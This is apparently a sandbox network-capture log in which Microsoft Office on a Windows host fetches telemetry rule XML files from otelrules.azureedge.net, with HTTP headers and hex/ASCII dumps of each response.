                                                                                                                                      2024-11-29 22:11:36 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      104192.168.2.44985713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:36 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1952
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                      x-ms-request-id: ba49513a-b01e-0098-68e4-41cead000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968ljs8phC1EWRe6en00000010b000000000dv6w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:36 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      105192.168.2.44985813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:36 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:37 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 958
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                      x-ms-request-id: 11676492-b01e-003d-10f9-41d32c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221137Z-174f7845968psccphC1EWRuz9s00000010pg00000000n7bm
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:37 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      106192.168.2.44985913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:37 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:38 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 501
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                      x-ms-request-id: 28a5aaf6-701e-000d-6b47-416de3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221138Z-174f78459685m244hC1EWRgp2c00000010fg000000000dnd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:38 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      107192.168.2.44986013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:38 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:38 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2592
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                      x-ms-request-id: e5837872-c01e-00a1-6f26-417e4a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221138Z-174f7845968frfdmhC1EWRxxbw00000010fg00000000medv
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:38 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      108192.168.2.44986113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:38 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:38 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 3342
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                      x-ms-request-id: 13d8e9aa-301e-0020-7d2e-416299000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221138Z-174f7845968pght8hC1EWRyvxg00000003sg0000000028us
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:38 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      109192.168.2.44986213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:38 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:39 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 2284
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                      x-ms-request-id: fdaae0ed-201e-000c-15df-4179c4000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221139Z-174f7845968zgtf6hC1EWRqd8s0000000tm00000000012q6
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:39 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      110192.168.2.44986313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:39 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:39 UTC515INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:39 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1250
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                      ETag: "0x8DC582BDE4487AA"
                                                                                                                                      x-ms-request-id: baa0a071-001e-0082-5b91-3f5880000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221139Z-174f7845968jrjrxhC1EWRmmrs00000010kg00000000hk39
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:39 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      111192.168.2.44986413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:40 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:40 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1393
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                      x-ms-request-id: 9018dc86-401e-0067-0d2e-4109c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221140Z-174f7845968glpgnhC1EWR7uec00000010n000000000hhtt
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:40 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      112192.168.2.44986613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:40 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:40 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1393
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                      x-ms-request-id: 2b15fac9-d01e-002b-104f-4125fb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221140Z-174f7845968frfdmhC1EWRxxbw00000010g000000000ghx3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:40 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      113192.168.2.44986713.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:41 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:41 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1356
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                      x-ms-request-id: 3d9c3aa7-901e-00ac-5891-3fb69e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221141Z-174f7845968j6t2phC1EWRcfe800000010n000000000gtp3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
